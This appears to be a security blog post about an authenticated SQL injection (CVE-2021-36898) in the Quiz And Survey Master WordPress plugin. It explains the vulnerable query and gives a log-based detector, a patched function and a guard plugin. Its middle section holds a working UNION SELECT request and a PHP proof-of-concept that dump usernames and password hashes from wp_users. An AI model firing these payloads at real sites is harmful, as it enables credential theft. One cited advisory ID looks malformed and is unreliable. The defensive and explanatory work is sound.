If you are running the Quiz And Survey Master (QSM) plugin on your WordPress site and haven’t updated it past version 7.3.4, it’s time to pay close attention. The vulnerability identified as CVE-2021-36898 exposes you to a dangerous SQL Injection attack that can let hackers mess with your database—even if they aren’t full admins.

Let’s break down what this means, how the attack works, and what you should do. We’ll keep it simple and show you what was going on under the hood.

What is CVE-2021-36898?

This security issue is an Authenticated SQL Injection (SQLi) vulnerability in the Quiz And Survey Master plugin for WordPress, up to and including version 7.3.4. Authenticated means attackers need at least a basic user account on your site (even a subscriber) to exploit it.

With this bug, a logged-in attacker can mess with database queries and, in some cases, get sensitive data, change values, or even fully compromise your WordPress website’s backend data.

What is SQL Injection and Why Should You Care?

SQL Injection happens when an application lets user-supplied data get smuggled directly into a database query without proper checks or cleaning (sanitization and escaping). That’s a big problem, because a clever attacker can sneak in commands that force the database to return secrets or manipulate data.

Authenticated SQLi means they need to log in first—but WordPress sites often allow user registration, so that’s not much of a hurdle for an attacker.

How Does This Vulnerability Work?

The core of the problem lies in the qsm_get_questions_from_quiz function. In QSM ≤ 7.3.4 it fails to validate and sanitize the input it uses when building SQL queries, so a malicious user can pass crafted parameters that make QSM run arbitrary SQL on your database.

The specific vulnerable code in qsm-main.php looks something like this:

function qsm_get_questions_from_quiz($quiz_id) {
    global $wpdb;
    // $quiz_id is interpolated straight into the SQL string: no prepare(), no cast.
    return $wpdb->get_results(
        "SELECT * FROM {$wpdb->prefix}mlw_questions WHERE quiz_id = {$quiz_id}", ARRAY_A
    );
}

Notice that $quiz_id is interpolated directly into the double-quoted SQL string, without $wpdb->prepare() or even intval($quiz_id). That’s dangerous: whatever an attacker sends in the quiz_id parameter becomes part of the query, and they can use it to read or alter your database.

- An attacker creates a regular WordPress account (subscriber role) or takes over an existing one.
- They send a crafted POST/GET request with malicious input to the plugin's endpoint (for example, via admin-ajax.php or through the question-fetching functions).
- The database receives their hostile payload and processes it, allowing them to extract or change data.

Here’s a raw example request that exploits the bug:

POST /wp-admin/admin-ajax.php
Content-Type: application/x-www-form-urlencoded

action=qsm_get_questions_from_quiz&quiz_id=1 UNION SELECT user_login, user_pass, null, null, null, null, null FROM wp_users--

What happens?
Instead of just grabbing questions for quiz ID 1, the hacker forces the database to fetch usernames and (hashed) passwords from the wp_users table!

Proof-of-Concept (PoC) PHP Snippet

$postdata = array(
    'action' => 'qsm_get_questions_from_quiz',
    'quiz_id' => "1 UNION SELECT user_login, user_pass, null, null, null, null, null FROM wp_users-- "
);

$response = wp_remote_post('https://targetsite.com/wp-admin/admin-ajax.php', array(
    'method'    => 'POST',
    'body'      => $postdata
));

echo wp_remote_retrieve_body($response);

This code will try to return username and password hashes from all users on the WordPress site.
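On the detection side, the request above leaves a clear fingerprint: the quiz_id parameter is supposed to be a single integer, so any request to the QSM question-fetch action whose quiz_id contains anything other than digits is worth an alert. The following script is an added example for this post, not code from the QSM project: it parses web-server access-log lines and reports such requests. The action and parameter names are taken from the post; the log lines are constructed for the demo.

```php
<?php
// Added example (not code from the QSM project): scan access-log lines for
// admin-ajax.php requests that carry the qsm_get_questions_from_quiz action
// with a quiz_id that is not a plain integer. Sample log lines are constructed.

// Parse a Common Log Format line into method, path and query string.
// Returns null when the line does not contain a recognisable request line.
function parse_access_log_line(string $line): ?array
{
    if (!preg_match('/"([A-Z]+) ([^ ?"]+)(?:\?([^ "]*))? HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    return ['method' => $m[1], 'path' => $m[2], 'query' => $m[3] ?? ''];
}

// True when the query string targets the QSM question-fetch action with a
// quiz_id that is anything other than a string of digits. Array-style
// parameters (quiz_id[]=...) are treated as suspicious as well, since the
// plugin code only ever expects a scalar id.
function qsm_request_is_suspicious(string $query): bool
{
    parse_str($query, $params); // also URL-decodes the values
    if (($params['action'] ?? null) !== 'qsm_get_questions_from_quiz') {
        return false;
    }
    if (!array_key_exists('quiz_id', $params)) {
        return false; // no id supplied; nothing reaches the query
    }
    $quizId = $params['quiz_id'];
    return !is_string($quizId) || !ctype_digit($quizId);
}

// Return the subset of log lines that look like attempts against the bug.
function find_suspicious_qsm_requests(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $req = parse_access_log_line($line);
        if ($req !== null
            && basename($req['path']) === 'admin-ajax.php'
            && qsm_request_is_suspicious($req['query'])) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample lines: one benign call, one with the injection shape
// from the post (URL-encoded, as a web server logs it), one unrelated action.
$sampleLog = [
    '203.0.113.5 - - [28/Oct/2022:18:15:00 +0000] "GET /wp-admin/admin-ajax.php?action=qsm_get_questions_from_quiz&quiz_id=3 HTTP/1.1" 200 512',
    '203.0.113.9 - - [28/Oct/2022:18:16:02 +0000] "GET /wp-admin/admin-ajax.php?action=qsm_get_questions_from_quiz&quiz_id=1%20UNION%20SELECT%20user_login%2Cuser_pass%20FROM%20wp_users-- HTTP/1.1" 200 2048',
    '203.0.113.9 - - [28/Oct/2022:18:16:10 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64',
];

foreach (find_suspicious_qsm_requests($sampleLog) as $hit) {
    echo "ALERT: non-numeric quiz_id sent to QSM: {$hit}\n";
}
```

Only the second sample line is reported. One caveat: a default access log records the request line only, so this catches GET-style abuse; the POST variant shown earlier carries its parameters in the body, which you would see only with body logging on a reverse proxy or WAF, or by validating inside WordPress itself.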

How to Fix and Defend

1. Update QSM Plugin – The developers fixed this issue in version 7.3.5. If you haven’t updated yet, do it *now*.

2. Apply a temporary fix – If you can’t upgrade yet, patch the vulnerable function so that it validates the input and uses a prepared statement:

function qsm_get_questions_from_quiz($quiz_id) {
    global $wpdb;
    // Coerce to an integer first, so the value can only ever be a number.
    $quiz_id = intval($quiz_id);
    return $wpdb->get_results(
        // %d binds the value as an integer; user input never becomes SQL text.
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}mlw_questions WHERE quiz_id = %d", $quiz_id
        ),
        ARRAY_A
    );
}
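Editing a third-party plugin file is fragile, because the next plugin update silently overwrites it. A stopgap that survives updates is a small must-use plugin that validates quiz_id before admin-ajax.php dispatches the action. The one below is an added example, not code from the QSM project or the original post; it assumes the request shape the post describes (action=qsm_get_questions_from_quiz with a quiz_id parameter), and the qsm_guard_* function names are hypothetical.

```php
<?php
/**
 * Plugin Name: QSM quiz_id guard (added example, not part of QSM)
 *
 * Stopgap for sites that cannot yet move to QSM 7.3.5: validates the quiz_id
 * parameter before admin-ajax.php dispatches the qsm_get_questions_from_quiz
 * action. The action name comes from the post; the function names here are
 * hypothetical. Install as wp-content/mu-plugins/qsm-quiz-id-guard.php.
 */

// A valid quiz id is a non-empty string of digits of sane length. Arrays
// (quiz_id[]=...) and anything containing spaces, quotes or keywords fail.
function qsm_guard_is_valid_quiz_id($value): bool
{
    if (is_int($value)) {
        return $value >= 0;
    }
    if (!is_string($value)) {
        return false;
    }
    return $value !== '' && strlen($value) <= 10 && ctype_digit($value);
}

// Runs on init, which admin-ajax.php fires before routing to the wp_ajax_*
// handler, so the plugin's query is never built from a bad value.
function qsm_guard_check_request(): void
{
    $action = $_REQUEST['action'] ?? '';
    if (!is_string($action) || $action !== 'qsm_get_questions_from_quiz') {
        return;
    }
    if (!array_key_exists('quiz_id', $_REQUEST)) {
        return; // nothing to validate; let the plugin decide what to do
    }
    if (qsm_guard_is_valid_quiz_id($_REQUEST['quiz_id'])) {
        return;
    }
    // Record the source for triage. The payload itself is deliberately not
    // logged, so the log file does not become a copy of attacker-supplied SQL.
    error_log(sprintf(
        'qsm_guard: rejected non-numeric quiz_id from %s (user id %d)',
        $_SERVER['REMOTE_ADDR'] ?? 'unknown',
        get_current_user_id()
    ));
    // Responds with HTTP 400 and terminates the request (wp_send_json_error calls wp_die).
    wp_send_json_error(['message' => 'Invalid quiz id'], 400);
}
add_action('init', 'qsm_guard_check_request');
```

Rejecting rather than coercing is a deliberate choice: intval("1 UNION SELECT ...") quietly becomes 1, which stops the injection but hides the probe, whereas a strict digit check plus a log line gives you a detection signal for the account that sent it.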

References and Further Reading

- Plugin Vulnerabilities - Patchstack Advisory
- WPScan Advisory WPVDB ID: 7BB16A2C-DB1-4264-833A-FFDEB11DED22
- NVD Official Entry

Conclusion

CVE-2021-36898 is a serious vulnerability for anyone using the Quiz And Survey Master plugin on WordPress. Even standard users can try to exploit this bug to see or even change data in your WordPress database. Patching by updating your plugin is a must. Always keep plugins up to date and check for recent security news, especially for plugins as widely used as QSM.

Timeline

Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/31/2022 17:22:00 UTC